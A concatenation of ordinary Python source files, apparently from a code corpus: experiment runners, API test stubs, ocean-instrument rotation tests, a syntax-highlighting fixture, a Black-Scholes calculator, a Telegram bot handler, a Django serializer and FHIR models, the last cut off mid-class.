    """
    lower_sd, upper_sd = 0.6, 0.1
    xs = uniform(-1.0, 1.0, size = noise_data_points)
    ys = array([noise_f(xi) +
                (normal(0.0, lower_sd) if xi < 0 else normal(0.0, upper_sd))
                for xi in xs], double)
    write_data(xs, ys, noise_data_file)
def write_noise_raw_data():
    """Write the noise-free V-shaped function on a dense grid."""
    grid = linspace(-1, 1, 1000)
    values = array([noise_f(g) for g in grid], double)
    write_data(grid, values, noise_data_raw_file)
def read_noise_data():
    """Return the (X, Y) arrays loaded from the noise data file."""
    return read_data(noise_data_file)
def write_sinus_data():
    """Sample sin(2*pi*x) on [-1, 1] with N(0, sd=0.15) noise and write it."""
    xs = uniform(-1.0, 1.0, size = sinus_data_points)
    ys = sin(2 * pi * xs) + normal(0.0, 0.15, size = sinus_data_points)
    write_data(xs, ys, sinus_data_file)
def write_sinus_raw_data():
    """Write noise-free sin(2*pi*x) on a dense grid."""
    grid = linspace(-1.0, 1.0, 1000)
    write_data(grid, sin(2 * pi * grid), sinus_data_raw_file)
def read_sinus_data():
    """Return the (X, Y) arrays loaded from the sinusoid data file."""
    return read_data(sinus_data_file)
def exp2a():
    """Run the GA on the Waterhouse data with RBF classifiers.

    250 epochs, population of 20 individuals whose initial sizes are drawn
    from 1 + Binomial(4, 0.5).
    """
    X, Y = read_waterhouse_data()
    N = X.shape[0]
    Xf = ones(N, double).reshape(N, 1)
    cl_store = RBF1DClStore(0.0, 4.0)
    # FIX: range() instead of the Python-2-only xrange(); the list is tiny
    # (20 entries), so materializing it on Python 2 is harmless, and the
    # code now also runs under Python 3.
    GA_experiment(X, Y, Xf, 250,
                  [1 + binomial(4, 0.5) for p in range(20)],
                  cl_store, RBF1DIndv,
                  'exp2a_fitness.data', 'exp2a_cls.data')
def exp2b():
    """Run MCMC on the Waterhouse data with RBF classifiers."""
    X, Y = read_waterhouse_data()
    num = X.shape[0]
    Xf = ones(num, double).reshape(num, 1)
    store = RBF1DClStore(0.0, 4.0)
    MCMC_experiment(X, Y, Xf, 500, 10, 0.25,
                    1 + binomial(4, 0.5),
                    store,
                    'exp2b_varbound.data', 'exp2b_cls.data')
def exp2c():
    """Run the GA on the 'own' data set with RBF classifiers.

    250 epochs, population of 20 individuals whose initial sizes are drawn
    from 1 + Binomial(8, 0.5).
    """
    X, Y = read_own_data()
    N = X.shape[0]
    Xf = ones(N, double).reshape(N, 1)
    cl_store = RBF1DClStore(0.0, 1.0)
    # FIX: range() instead of the Python-2-only xrange() (Python 3 compatible).
    GA_experiment(X, Y, Xf, 250,
                  [1 + binomial(8, 0.5) for p in range(20)],
                  cl_store, RBF1DIndv,
                  'exp2c_fitness.data', 'exp2c_cls.data')
def exp2d():
    """Run MCMC on the 'own' data set with RBF classifiers."""
    X, Y = read_own_data()
    num = X.shape[0]
    Xf = ones(num, double).reshape(num, 1)
    store = RBF1DClStore(0.0, 1.0)
    MCMC_experiment(X, Y, Xf, 500, 10, 0.25,
                    1 + binomial(8, 0.5),
                    store,
                    'exp2d_varbound.data', 'exp2d_cls.data')
def exp2e():
    """Run the GA on the heteroscedastic-noise data with soft interval classifiers.

    250 epochs, population of 20 individuals whose initial sizes are drawn
    from 1 + Binomial(8, 0.5).
    """
    X, Y = read_noise_data()
    N = X.shape[0]
    Xf = ones(N, double).reshape(N, 1)
    cl_store = SoftIntervalClStore(-1.0, 1.0)
    # FIX: range() instead of the Python-2-only xrange() (Python 3 compatible).
    GA_experiment(X, Y, Xf, 250,
                  [1 + binomial(8, 0.5) for p in range(20)],
                  cl_store, SoftInterval1DIndv,
                  'exp2e_fitness.data', 'exp2e_cls.data')
def exp2f():
    """Run MCMC on the heteroscedastic-noise data with soft interval classifiers."""
    X, Y = read_noise_data()
    num = X.shape[0]
    Xf = ones(num, double).reshape(num, 1)
    store = SoftIntervalClStore(-1.0, 1.0)
    MCMC_experiment(X, Y, Xf, 500, 10, 0.25,
                    1 + binomial(8, 0.5),
                    store,
                    'exp2f_varbound.data', 'exp2f_cls.data')
def exp2g():
    """Run the GA on the sinusoid data with soft interval classifiers.

    250 epochs, population of 20 individuals whose initial sizes are drawn
    from 1 + Binomial(8, 0.5).
    """
    X, Y = read_sinus_data()
    N = X.shape[0]
    Xf = ones(N, double).reshape(N, 1)
    cl_store = SoftIntervalClStore(-1.0, 1.0)
    # FIX: range() instead of the Python-2-only xrange() (Python 3 compatible).
    GA_experiment(X, Y, Xf, 250,
                  [1 + binomial(8, 0.5) for p in range(20)],
                  cl_store, SoftInterval1DIndv,
                  'exp2g_fitness.data', 'exp2g_cls.data')
def exp2h():
    """Run MCMC on the sinusoid data with soft interval classifiers."""
    X, Y = read_sinus_data()
    num = X.shape[0]
    Xf = ones(num, double).reshape(num, 1)
    store = SoftIntervalClStore(-1.0, 1.0)
    MCMC_experiment(X, Y, Xf, 500, 10, 0.25,
                    1 + binomial(8, 0.5),
                    store,
                    'exp2h_varbound.data', 'exp2h_cls.data')
# run experiments from arguments
if __name__ == '__main__':
    # Dispatch table from command-line token to experiment function.
    # FIX: dropped the redundant `lambda:` wrappers — the functions themselves
    # are the callables.
    exp_modes = {'gen1': write_waterhouse_data,
                 'gen2': write_own_data,
                 'gen3': write_noise_data,
                 'gen4': write_sinus_data,
                 'raw1': write_waterhouse_raw_data,
                 'raw2': write_own_raw_data,
                 'raw3': write_noise_raw_data,
                 'raw4': write_sinus_raw_data,
                 'a': exp2a,
                 'b': exp2b,
                 'c': exp2c,
                 'd': exp2d,
                 'e': exp2e,
                 'f': exp2f,
                 'g': exp2g,
                 'h': exp2h}
    for argv in sys.argv[1:]:
        # FIX: dict.has_key() was removed in Python 3; `in` works in both.
        # Single-argument print(...) is also valid Python 2, so these calls
        # are now 2/3-compatible. Message typo "Unkown" corrected.
        if argv not in exp_modes:
            print("--- Unknown experiment: %s" % argv)
        else:
            print("--- Running '%s'" % argv)
            exp_modes[argv]()
| 8,929 | 3,669 |
# coding: utf-8
"""
Emby Server API
Explore the Emby Server API # noqa: E501
OpenAPI spec version: 4.1.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import embyapi
from embyapi.api.live_tv_service_api import LiveTvServiceApi # noqa: E501
from embyapi.rest import ApiException
class TestLiveTvServiceApi(unittest.TestCase):
    """LiveTvServiceApi unit test stubs"""
    # Auto-generated by swagger-codegen: one placeholder test per endpoint of
    # the LiveTvService API. Every stub currently passes unconditionally;
    # fill in request/response assertions as endpoints are exercised.
    # NOTE(review): "discvover" below mirrors a typo in the generated API
    # method name — keep them in sync if the generator output is fixed.

    def setUp(self):
        self.api = LiveTvServiceApi()  # noqa: E501

    def tearDown(self):
        pass

    def test_delete_livetv_channelmappingoptions(self):
        """Test case for delete_livetv_channelmappingoptions
        """
        pass

    def test_delete_livetv_channelmappings(self):
        """Test case for delete_livetv_channelmappings
        """
        pass

    def test_delete_livetv_listingproviders(self):
        """Test case for delete_livetv_listingproviders
        Deletes a listing provider # noqa: E501
        """
        pass

    def test_delete_livetv_recordings_by_id(self):
        """Test case for delete_livetv_recordings_by_id
        Deletes a live tv recording # noqa: E501
        """
        pass

    def test_delete_livetv_seriestimers_by_id(self):
        """Test case for delete_livetv_seriestimers_by_id
        Cancels a live tv series timer # noqa: E501
        """
        pass

    def test_delete_livetv_timers_by_id(self):
        """Test case for delete_livetv_timers_by_id
        Cancels a live tv timer # noqa: E501
        """
        pass

    def test_delete_livetv_tunerhosts(self):
        """Test case for delete_livetv_tunerhosts
        Deletes a tuner host # noqa: E501
        """
        pass

    def test_get_livetv_channelmappingoptions(self):
        """Test case for get_livetv_channelmappingoptions
        """
        pass

    def test_get_livetv_channelmappings(self):
        """Test case for get_livetv_channelmappings
        """
        pass

    def test_get_livetv_channels(self):
        """Test case for get_livetv_channels
        Gets available live tv channels. # noqa: E501
        """
        pass

    def test_get_livetv_channels_by_id(self):
        """Test case for get_livetv_channels_by_id
        Gets a live tv channel # noqa: E501
        """
        pass

    def test_get_livetv_guideinfo(self):
        """Test case for get_livetv_guideinfo
        Gets guide info # noqa: E501
        """
        pass

    def test_get_livetv_info(self):
        """Test case for get_livetv_info
        Gets available live tv services. # noqa: E501
        """
        pass

    def test_get_livetv_listingproviders(self):
        """Test case for get_livetv_listingproviders
        Gets current listing providers # noqa: E501
        """
        pass

    def test_get_livetv_listingproviders_available(self):
        """Test case for get_livetv_listingproviders_available
        Gets listing provider # noqa: E501
        """
        pass

    def test_get_livetv_listingproviders_default(self):
        """Test case for get_livetv_listingproviders_default
        """
        pass

    def test_get_livetv_listingproviders_lineups(self):
        """Test case for get_livetv_listingproviders_lineups
        Gets available lineups # noqa: E501
        """
        pass

    def test_get_livetv_listingproviders_schedulesdirect_countries(self):
        """Test case for get_livetv_listingproviders_schedulesdirect_countries
        Gets available lineups # noqa: E501
        """
        pass

    def test_get_livetv_liverecordings_by_id_stream(self):
        """Test case for get_livetv_liverecordings_by_id_stream
        Gets a live tv channel # noqa: E501
        """
        pass

    def test_get_livetv_livestreamfiles_by_id_by_container(self):
        """Test case for get_livetv_livestreamfiles_by_id_by_container
        Gets a live tv channel # noqa: E501
        """
        pass

    def test_get_livetv_programs(self):
        """Test case for get_livetv_programs
        Gets available live tv epgs.. # noqa: E501
        """
        pass

    def test_get_livetv_programs_recommended(self):
        """Test case for get_livetv_programs_recommended
        Gets available live tv epgs.. # noqa: E501
        """
        pass

    def test_get_livetv_recordings(self):
        """Test case for get_livetv_recordings
        Gets live tv recordings # noqa: E501
        """
        pass

    def test_get_livetv_recordings_by_id(self):
        """Test case for get_livetv_recordings_by_id
        Gets a live tv recording # noqa: E501
        """
        pass

    def test_get_livetv_recordings_folders(self):
        """Test case for get_livetv_recordings_folders
        Gets recording folders # noqa: E501
        """
        pass

    def test_get_livetv_recordings_groups(self):
        """Test case for get_livetv_recordings_groups
        Gets live tv recording groups # noqa: E501
        """
        pass

    def test_get_livetv_recordings_groups_by_id(self):
        """Test case for get_livetv_recordings_groups_by_id
        Gets a recording group # noqa: E501
        """
        pass

    def test_get_livetv_recordings_series(self):
        """Test case for get_livetv_recordings_series
        Gets live tv recordings # noqa: E501
        """
        pass

    def test_get_livetv_seriestimers(self):
        """Test case for get_livetv_seriestimers
        Gets live tv series timers # noqa: E501
        """
        pass

    def test_get_livetv_seriestimers_by_id(self):
        """Test case for get_livetv_seriestimers_by_id
        Gets a live tv series timer # noqa: E501
        """
        pass

    def test_get_livetv_timers(self):
        """Test case for get_livetv_timers
        Gets live tv timers # noqa: E501
        """
        pass

    def test_get_livetv_timers_by_id(self):
        """Test case for get_livetv_timers_by_id
        Gets a live tv timer # noqa: E501
        """
        pass

    def test_get_livetv_timers_defaults(self):
        """Test case for get_livetv_timers_defaults
        Gets default values for a new timer # noqa: E501
        """
        pass

    def test_get_livetv_tunerhosts(self):
        """Test case for get_livetv_tunerhosts
        Gets tuner hosts # noqa: E501
        """
        pass

    def test_get_livetv_tunerhosts_types(self):
        """Test case for get_livetv_tunerhosts_types
        """
        pass

    def test_get_livetv_tuners_discvover(self):
        """Test case for get_livetv_tuners_discvover
        """
        pass

    def test_head_livetv_channelmappingoptions(self):
        """Test case for head_livetv_channelmappingoptions
        """
        pass

    def test_head_livetv_channelmappings(self):
        """Test case for head_livetv_channelmappings
        """
        pass

    def test_options_livetv_channelmappingoptions(self):
        """Test case for options_livetv_channelmappingoptions
        """
        pass

    def test_options_livetv_channelmappings(self):
        """Test case for options_livetv_channelmappings
        """
        pass

    def test_patch_livetv_channelmappingoptions(self):
        """Test case for patch_livetv_channelmappingoptions
        """
        pass

    def test_patch_livetv_channelmappings(self):
        """Test case for patch_livetv_channelmappings
        """
        pass

    def test_post_livetv_channelmappingoptions(self):
        """Test case for post_livetv_channelmappingoptions
        """
        pass

    def test_post_livetv_channelmappings(self):
        """Test case for post_livetv_channelmappings
        """
        pass

    def test_post_livetv_listingproviders(self):
        """Test case for post_livetv_listingproviders
        Adds a listing provider # noqa: E501
        """
        pass

    def test_post_livetv_programs(self):
        """Test case for post_livetv_programs
        Gets available live tv epgs.. # noqa: E501
        """
        pass

    def test_post_livetv_seriestimers(self):
        """Test case for post_livetv_seriestimers
        Creates a live tv series timer # noqa: E501
        """
        pass

    def test_post_livetv_seriestimers_by_id(self):
        """Test case for post_livetv_seriestimers_by_id
        Updates a live tv series timer # noqa: E501
        """
        pass

    def test_post_livetv_timers(self):
        """Test case for post_livetv_timers
        Creates a live tv timer # noqa: E501
        """
        pass

    def test_post_livetv_timers_by_id(self):
        """Test case for post_livetv_timers_by_id
        Updates a live tv timer # noqa: E501
        """
        pass

    def test_post_livetv_tunerhosts(self):
        """Test case for post_livetv_tunerhosts
        Adds a tuner host # noqa: E501
        """
        pass

    def test_post_livetv_tuners_by_id_reset(self):
        """Test case for post_livetv_tuners_by_id_reset
        Resets a tv tuner # noqa: E501
        """
        pass

    def test_put_livetv_channelmappingoptions(self):
        """Test case for put_livetv_channelmappingoptions
        """
        pass

    def test_put_livetv_channelmappings(self):
        """Test case for put_livetv_channelmappings
        """
        pass
if __name__ == '__main__':
    # Allow running this generated test module directly.
    unittest.main()
| 9,439 | 3,224 |
from dolfyn.tests import test_read_adp as tr
from dolfyn.tests import base
from dolfyn.rotate.api import rotate2
from numpy.testing import assert_allclose
import numpy as np
import scipy.io as sio
"""
Testing against velocity and bottom-track velocity data in Nortek mat files
exported from SignatureDeployment.
inst2earth rotation fails for AHRS-equipped istruments and I don't know why -
I believe it's due to an RC filter (or some such) on Nortek's side after they
load in the orientation matrix from the AHRS (Check out the difference
colorplots compared to non-AHRS instruments.) Using HPR- or quaterion-calc'd
orientation matrices doesn't close the gap.
"""
def load_nortek_matfile(filename):
    """Load velocity (and optional bottom-track) data from a Nortek
    SignatureDeployment-exported .mat file.

    Returns a dict keyed by coordinate system ('beam', 'inst', 'earth'),
    each value a (4, ...) array of the stacked velocity components; adds
    'omat' (AHRS rotation matrix) and 'b5' (5th beam velocity) when those
    fields exist. NOTE(review): return type is inconsistent by design —
    if bottom-track fields are present, returns a (vel, vel_bt) tuple
    instead of vel alone; callers unpack accordingly.
    """
    # remember to transpose this data
    data = sio.loadmat(filename,
                       struct_as_record=False,
                       squeeze_me=True)
    d = data['Data']
    # print(d._fieldnames)
    burst = 'Burst'
    bt = 'BottomTrack'
    # Field-name suffixes per coordinate system.
    beam = ['_VelBeam1', '_VelBeam2', '_VelBeam3', '_VelBeam4']
    b5 = 'IBurst_VelBeam5'
    inst = ['_VelX', '_VelY', '_VelZ1', '_VelZ2']
    earth = ['_VelEast', '_VelNorth', '_VelUp1', '_VelUp2']
    axis = {'beam': beam, 'inst': inst, 'earth': earth}
    AHRS = 'Burst_AHRSRotationMatrix'  # , 'IBurst_AHRSRotationMatrix']
    vel = {'beam': {}, 'inst': {}, 'earth': {}}
    for ky in vel.keys():
        # Collect the four per-component arrays, then stack along axis 0.
        for i in range(len(axis[ky])):
            vel[ky][i] = np.transpose(getattr(d, burst+axis[ky][i]))
        vel[ky] = np.stack((vel[ky][0], vel[ky][1],
                            vel[ky][2], vel[ky][3]), axis=0)
    if AHRS in d._fieldnames:
        vel['omat'] = np.transpose(getattr(d, AHRS))
    if b5 in d._fieldnames:
        vel['b5'] = np.transpose(getattr(d, b5))
        #vel['omat5'] = getattr(d, AHRS[1])
    if bt+beam[0] in d._fieldnames:
        # Bottom-track fields mirror the burst layout.
        vel_bt = {'beam': {}, 'inst': {}, 'earth': {}}
        for ky in vel_bt.keys():
            for i in range(len(axis[ky])):
                vel_bt[ky][i] = np.transpose(getattr(d, bt+axis[ky][i]))
            vel_bt[ky] = np.stack((vel_bt[ky][0], vel_bt[ky][1],
                                   vel_bt[ky][2], vel_bt[ky][3]), axis=0)
        return vel, vel_bt
    else:
        return vel
def rotate(axis):
    """Rotate the four test datasets into `axis` coordinates and compare the
    velocities (and, where present, beam-5 and bottom-track velocities)
    against Nortek's MATLAB-exported reference values.
    """
    # BenchFile01.ad2cp
    td_sig = rotate2(tr.dat_sig, axis, inplace=False)
    # Sig1000_IMU.ad2cp no userdata
    td_sig_i = rotate2(tr.dat_sig_i, axis, inplace=False)
    # VelEchoBT01.ad2cp
    td_sig_ieb = rotate2(tr.dat_sig_ieb, axis,
                         inplace=False)
    # Sig500_Echo.ad2cp
    td_sig_ie = rotate2(tr.dat_sig_ie, axis,
                        inplace=False)
    # Reference data exported from SignatureDeployment (see module docstring).
    td_sig_vel = load_nortek_matfile(base.rfnm('BenchFile01.mat'))
    td_sig_i_vel = load_nortek_matfile(base.rfnm('Sig1000_IMU.mat'))
    td_sig_ieb_vel, vel_bt = load_nortek_matfile(base.rfnm('VelEchoBT01.mat'))
    td_sig_ie_vel = load_nortek_matfile(base.rfnm('Sig500_Echo.mat'))
    # Only the first `nens` ensembles are compared.
    nens = 100
    # ARHS inst2earth orientation matrix check
    # Checks the 1,1 element because the nortek orientmat's shape is [9,:] as
    # opposed to [3,3,:]
    if axis == 'inst':
        assert_allclose(td_sig_i.orientmat[0][0].values,
                        td_sig_i_vel['omat'][0, :nens], atol=1e-7)
        assert_allclose(td_sig_ieb.orientmat[0][0].values,
                        td_sig_ieb_vel['omat'][0, :][..., :nens], atol=1e-7)
    # 4-beam velocity
    # NOTE(review): looser tolerance (5e-3) on the AHRS-equipped instruments —
    # see module docstring about the unexplained inst2earth gap.
    assert_allclose(td_sig.vel.values, td_sig_vel[axis][..., :nens], atol=1e-5)
    assert_allclose(td_sig_i.vel.values,
                    td_sig_i_vel[axis][..., :nens], atol=5e-3)
    assert_allclose(td_sig_ieb.vel.values,
                    td_sig_ieb_vel[axis][..., :nens], atol=5e-3)
    assert_allclose(td_sig_ie.vel.values,
                    td_sig_ie_vel[axis][..., :nens], atol=1e-5)
    # 5th-beam velocity
    if axis == 'beam':
        assert_allclose(td_sig_i.vel_b5.values,
                        td_sig_i_vel['b5'][..., :nens], atol=1e-5)
        assert_allclose(td_sig_ieb.vel_b5.values,
                        td_sig_ieb_vel['b5'][..., :nens], atol=1e-5)
        assert_allclose(td_sig_ie.vel_b5.values,
                        td_sig_ie_vel['b5'][..., :nens], atol=1e-5)
    # bottom-track
    assert_allclose(td_sig_ieb.vel_bt.values,
                    vel_bt[axis][..., :nens], atol=5e-3)
def test_rotate2_beam():
    # Validate beam-coordinate velocities against the Nortek exports.
    rotate('beam')
def test_rotate2_inst():
    # Validate instrument-coordinate velocities (includes the AHRS orientmat check).
    rotate('inst')
def test_rotate2_earth():
    # Validate earth-coordinate velocities against the Nortek exports.
    rotate('earth')
| 4,454 | 1,747 |
a = r'
(?x)
foo
'
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
: source.python
( : punctuation.parenthesis.begin.python, source.python
? : invalid.illegal.operator.python, source.python
x : source.python
) : punctuation.parenthesis.end.python, source.python
: source.python
foo : source.python
' : punctuation.definition.string.begin.python, source.python, string.quoted.docstring.single.python
: invalid.illegal.newline.python, source.python, string.quoted.docstring.single.python
| 1,022 | 279 |
import math
def get_d1(p0, X, t, sigma, Rho):
    """Black-Scholes d1 term.

    :param p0: current stock price (worked example: 62)
    :param X: exercise (strike) price (worked example: 60)
    :param t: time to expiration in days, converted to years as t/365
    :param sigma: annualized volatility (worked example: 0.32)
    :param Rho: risk-free rate (worked example: 0.04)
    :return: d1 = [ln(p0/X) + (Rho + sigma^2/2)*(t/365)] / (sigma*sqrt(t/365))
    """
    numerator = math.log(p0 / X) + (Rho + 0.5 * sigma * sigma) * (t / 365)
    # BUG FIX: the denominator previously hard-coded the worked example's
    # 40 days (sigma * sqrt(40/365)); it must use the actual expiration t,
    # otherwise d1 is wrong for every other maturity.
    denominator = sigma * math.sqrt(t / 365)
    return numerator / denominator
def get_d2(d1, sigma, t):
    """Black-Scholes d2: d1 shifted down by one volatility over the period, i.e. d1 - sigma*sqrt(t/365)."""
    years = t / 365
    return d1 - sigma * math.sqrt(years)
def get_cumulative_standard_normal_distribution(d):
    """Standard normal CDF N(d), computed via the error function."""
    return (1 + math.erf(d / math.sqrt(2))) / 2
def get_call(p0, Nd1, X, Krf, t, Nd2):
    """Black-Scholes call value: p0*N(d1) - X*e^(-Krf*t/365)*N(d2)."""
    discounted_strike = X / (math.pow(math.e, Krf * t / 365))
    return p0 * Nd1 - discounted_strike * Nd2
def get_put(Vc, X, Krf, t, p0):
    """Put value via put-call parity: Vp = Vc + X*e^(-Krf*t/365) - p0."""
    discounted_strike = X / math.pow(math.e, Krf * t / 365)
    return Vc + discounted_strike - p0
if __name__ == "__main__":
# Z = (x - µ) / sigma
p0 = 62
X = 60
t = 40
sigma = 0.32
Rho = 0.04
d1 = get_d1(p0, X, t, sigma, Rho)
d2 = get_d2(d1, sigma, t)
Nd1 = get_cumulative_standard_normal_distribution(d1)
Nd2 = get_cumulative_standard_normal_distribution(d2)
Vc = get_call(p0, Nd1, X, Rho, t, Nd2)
Vp = get_put(Vc, X, Rho, t, p0)
print("d1:", d1)
print("d2:", d2)
print("Nd1:", Nd1)
print("Nd2:", Nd2)
print("Vc:", Vc)
print("Vp:", Vp) | 1,331 | 701 |
from .get_response import nyaa_id, sukebei_id
from bot import NYAA, botname
from pyrogram import Client, filters
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup, CallbackQuery
# Reply sent when /magnet is not called with exactly one ID argument.
INVALID_TEXT = """
No ID found!
"""
@NYAA.on_message(filters.command(["magnet", f"magnet@{botname}"], prefixes = "/") & ~filters.edited)
async def get_magnet(client, message):
    """Handle /magnet <id>: ask which site (Nyaa/Sukebei) to search.

    Replies with INVALID_TEXT unless the command has exactly one argument;
    otherwise presents inline buttons whose callback data embeds the ID.
    """
    query = message.text.split(maxsplit = 2)
    # Exactly two parts expected: the command itself and one ID.
    # (Simplified from `len(query) < 2 or len(query) > 2`.)
    if len(query) != 2:
        await NYAA.send_message(chat_id = message.chat.id, text = INVALID_TEXT)
        return
    buttons = [
        [
            InlineKeyboardButton("Nyaa", f"nyaa {query[-1]}"),
            InlineKeyboardButton("Sukebei", f"sukebei {query[-1]}")
        ]
    ]
    await NYAA.send_message(chat_id = message.chat.id, text = "Where do you wanna search?", reply_markup = InlineKeyboardMarkup(buttons))
"""App API serializers.
"""
import logging
from rest_framework import serializers
from ..models import Image
logger = logging.getLogger(__name__)
class ImageSerializer(serializers.ModelSerializer):
    """ImageSerializer.

    DRF ModelSerializer exposing every field of the Image model.
    """

    class Meta:
        # "__all__" serializes every model field; switch to an explicit
        # list if any column must be hidden from the API.
        model = Image
        fields = "__all__"
| 297 | 83 |
# -*- coding: utf-8 -*-
"""
Profile: https://www.hl7.org/fhir/DSTU2/implementationguide.html
Release: DSTU2
Version: 1.0.2
Revision: 7202
"""
from typing import Any, Dict
from typing import List as ListType
from pydantic import Field, root_validator
from . import backboneelement, domainresource, fhirtypes
class ImplementationGuide(domainresource.DomainResource):
    """A set of rules about how FHIR is used.

    A set of rules of how a particular interoperability or standards problem is
    solved - typically through the use of FHIR resources. This resource is used
    to gather all the parts of an implementation guide into a logical whole and
    to publish a computable definition of all the parts.

    Required fields (declared with ``...`` as the pydantic default):
    name, package, page, status, url. All other fields are optional.
    """

    resource_type = Field("ImplementationGuide", const=True)

    binary: ListType[fhirtypes.Uri] = Field(
        None,
        alias="binary",
        title="List of `uri` items.",
        description="Image, css, script, etc..",
    )

    contact: ListType[fhirtypes.ImplementationGuideContactType] = Field(
        None,
        alias="contact",
        title="Contact details for the publisher",
        description=(
            "Contact details to assist a user in finding and communicating with the"
            " publisher."
        ),
    )

    copyright: fhirtypes.String = Field(
        None,
        alias="copyright",
        title="Use and/or publishing restrictions",
        description=(
            "A copyright statement relating to the implementation guide and/or its "
            "contents. Copyright statements are generally legal restrictions on the"
            " use and publishing of the implementation guide."
        ),
    )

    date: fhirtypes.DateTime = Field(
        None,
        alias="date",
        title="Date last changed",
        description=(
            "The date (and optionally time) when the implementation guide was "
            "published. The date must change when the business version changes and "
            "it must change if the status code changes. In addition, it should "
            "change when the substantive content of the implementation guide "
            "changes."
        ),
    )

    dependency: ListType[fhirtypes.ImplementationGuideDependencyType] = Field(
        None,
        alias="dependency",
        title="Another Implementation guide this depends on",
        description=(
            "Another implementation guide that this implementation depends on. "
            "Typically, an implementation guide uses value sets, profiles "
            "etc.defined in other implementation guides."
        ),
    )

    description: fhirtypes.String = Field(
        None,
        alias="description",
        title="Natural language description of the implementation guide",
        description=(
            "A free text natural language description of the implementation guide "
            "from a consumer's perspective."
        ),
    )

    experimental: fhirtypes.Boolean = Field(
        None,
        alias="experimental",
        title="For testing purposes, not real usage",
        description=(
            "A Boolean value to indicate that this implementation guide is authored"
            " for testing purposes (or education/evaluation/marketing) and is not "
            "intended to be used for genuine usage."
        ),
    )

    # NOTE(review): the description text mentions "4.0.1" (an R4 version)
    # although this module's header says DSTU2 / 1.0.2 — likely copied from
    # the R4 definition; confirm before relying on it.
    fhirVersion: fhirtypes.Id = Field(
        None,
        alias="fhirVersion",
        title="FHIR Version this Implementation Guide targets",
        description=(
            "The version(s) of the FHIR specification that this ImplementationGuide"
            " targets - e.g. describes how to use. The value of this element is the"
            " formal version of the specification, without the revision number, "
            "e.g. [publication].[major].[minor], which is 4.0.1. for this version."
        ),
    )

    # "global" is a reserved word in Python, so the attribute is named
    # global_fhir and serialized/parsed via alias="global".
    global_fhir: ListType[fhirtypes.ImplementationGuideGlobalType] = Field(
        None,
        alias="global",
        title="Profiles that apply globally",
        description=(
            "A set of profiles that all resources covered by this implementation "
            "guide must conform to."
        ),
    )

    name: fhirtypes.String = Field(
        ...,
        alias="name",
        title="Name for this implementation guide (computer friendly)",
        description=(
            "A natural language name identifying the implementation guide. This "
            "name should be usable as an identifier for the module by machine "
            "processing applications such as code generation."
        ),
    )

    package: ListType[fhirtypes.ImplementationGuidePackageType] = Field(
        ...,
        alias="package",
        title="List of `ImplementationGuidePackage` items (represented as `dict` in JSON).",
        description="Group of resources as used in .page.package.",
    )

    page: fhirtypes.ImplementationGuidePageType = Field(
        ...,
        alias="page",
        title="Type `ImplementationGuidePage` (represented as `dict` in JSON).",
        description="Page/Section in the Guide.",
    )

    publisher: fhirtypes.String = Field(
        None,
        alias="publisher",
        title="Name of the publisher (organization or individual)",
        description=(
            "The name of the organization or individual that published the "
            "implementation guide."
        ),
    )

    status: fhirtypes.Code = Field(
        ...,
        alias="status",
        title="draft | active | retired",
        description=(
            "The status of this implementation guide. Enables tracking the life-"
            "cycle of the content."
        ),
        # note: Enum values can be used in validation,
        # but use in your own responsibilities, read official FHIR documentation.
        enum_values=["draft", "active", "retired"],
    )

    url: fhirtypes.Uri = Field(
        ...,
        alias="url",
        title=(
            "Canonical identifier for this implementation guide, represented as a "
            "URI (globally unique)"
        ),
        description=(
            "An absolute URI that is used to identify this implementation guide "
            "when it is referenced in a specification, model, design or an "
            "instance; also called its canonical identifier. This SHOULD be "
            "globally unique and SHOULD be a literal address at which at which an "
            "authoritative instance of this implementation guide is (or will be) "
            "published. This URL can be the target of a canonical reference. It "
            "SHALL remain the same when the implementation guide is stored on "
            "different servers."
        ),
    )

    useContext: ListType[fhirtypes.CodeableConceptType] = Field(
        None,
        alias="useContext",
        title="The context that the content is intended to support",
        description=(
            "The content was developed with a focus and intent of supporting the "
            "contexts that are listed. These contexts may be general categories "
            "(gender, age, ...) or may be references to specific programs "
            "(insurance plans, studies, ...) and may be used to assist with "
            "indexing and searching for appropriate implementation guide instances."
        ),
    )

    version: fhirtypes.String = Field(
        None,
        alias="version",
        title="Business version of the implementation guide",
        description=(
            "The identifier that is used to identify this version of the "
            "implementation guide when it is referenced in a specification, model, "
            "design or instance. This is an arbitrary value managed by the "
            "implementation guide author and is not expected to be globally unique."
            " For example, it might be a timestamp (e.g. yyyymmdd) if a managed "
            "version is not available. There is also no expectation that versions "
            "can be placed in a lexicographical sequence."
        ),
    )
class ImplementationGuideContact(backboneelement.BackboneElement):
    """Contact details of the publisher.

    Contacts to assist a user in finding and communicating with the publisher.
    Both fields are optional.
    """

    resource_type = Field("ImplementationGuideContact", const=True)

    name: fhirtypes.String = Field(
        None,
        alias="name",
        title="Type `str`.",
        description="Name of a individual to contact.",
    )

    telecom: ListType[fhirtypes.ContactPointType] = Field(
        None,
        alias="telecom",
        title="List of `ContactPoint` items (represented as `dict` in JSON).",
        description="Contact details for individual or publisher.",
    )
class ImplementationGuideDependency(backboneelement.BackboneElement):
    """Another Implementation guide this depends on.

    Another implementation guide that this implementation depends on.
    Typically, an implementation guide uses value sets, profiles etc.defined in
    other implementation guides.
    """

    # Bug fix: resource_type must match this element's DSTU2 name,
    # "ImplementationGuideDependency". The previous value,
    # "ImplementationGuideDependsOn", is the R4 element name and was
    # inconsistent with every sibling backbone class in this module.
    resource_type = Field("ImplementationGuideDependency", const=True)

    type: fhirtypes.Code = Field(
        ...,
        alias="type",
        title="Type `str`.",
        description="reference | inclusion.",
        # note: Enum values can be used in validation,
        # but use in your own responsibilities, read official FHIR documentation.
        enum_values=["reference", "inclusion"],
    )

    uri: fhirtypes.Uri = Field(
        ...,
        alias="uri",
        title="Identity of the IG that this depends on",
        description="A canonical reference to the Implementation guide for the dependency.",
    )
class ImplementationGuideGlobal(backboneelement.BackboneElement):
    """Profiles that apply globally.

    A set of profiles that all resources covered by this implementation guide
    must conform to. Both fields are required.
    """

    resource_type = Field("ImplementationGuideGlobal", const=True)

    profile: fhirtypes.ReferenceType = Field(
        ...,
        alias="profile",
        title="Profile that all resources must conform to",
        description="A reference to the profile that all instances must conform to.",
        # note: Listed Resource Type(s) should be allowed as Reference.
